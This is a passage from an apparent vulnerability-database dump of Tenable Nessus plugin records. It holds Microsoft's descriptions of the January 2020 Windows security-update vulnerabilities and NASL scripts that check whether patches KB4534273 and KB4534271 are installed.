\"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4534273\");\n script_xref(name:\"MSFT\", value:\"MS20-4534273\");\n\n script_name(english:\"KB4534273: Windows 10 Version 1809 and Windows Server 2019 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534273.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\");\n # https://support.microsoft.com/en-us/help/4534273/windows-10-update-kb4534273\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a22c8c16\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534273.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534273');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534273])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-06T17:26:26", "description": "The remote Windows host is missing security update 4534271.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when Remote Desktop Web Access improperly handles credential information. An attacker who successfully exploited this vulnerability could obtain legitimate users' credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft Hyper-V Virtual PCI on a host server fails to properly validate input from a privileged user on a guest operating system. (CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632, CVE-2020-0633)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when Microsoft Windows implements predictable memory section names. An attacker who successfully exploited this vulnerability could run arbitrary code as system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code- signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in- the-middle attacks and decrypt confidential information on user connections to the affected software. The security update addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. (CVE-2020-0601)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534271: Windows 10 Version 1607 and Windows Server 2016 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0611", "CVE-2020-0612", "CVE-2020-0613", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0617", "CVE-2020-0620", "CVE-2020-0622", "CVE-2020-0623", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0633", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0637", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0641", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0644", "CVE-2020-0646"], "modified": "2021-12-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534271.NASL", "href": "https://www.tenable.com/plugins/nessus/132858", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132858);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/12/13\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0609\",\n \"CVE-2020-0610\",\n \"CVE-2020-0611\",\n \"CVE-2020-0612\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/01/29\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4534271\");\n script_xref(name:\"MSFT\", value:\"MS20-4534271\");\n\n script_name(english:\"KB4534271: Windows 10 Version 1607 and Windows Server 2016 January 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534271.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an\n unauthenticated attacker connects to the target system\n using RDP and sends specially crafted requests. This\n vulnerability is pre-authentication and requires no user\n interaction. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on the target\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-0612)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534271/windows-10-update-kb4534271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e147f537\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534271.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534271');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534271])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T15:42:02", "description": "The remote Windows host is missing security update 4534309 or cumulative update 4534297. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0613, CVE-2020-0614, CVE-2020-0623, CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0609, CVE-2020-0610)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - An information disclosure vulnerability exists when Remote Desktop Web Access improperly handles credential information. An attacker who successfully exploited this vulnerability could obtain 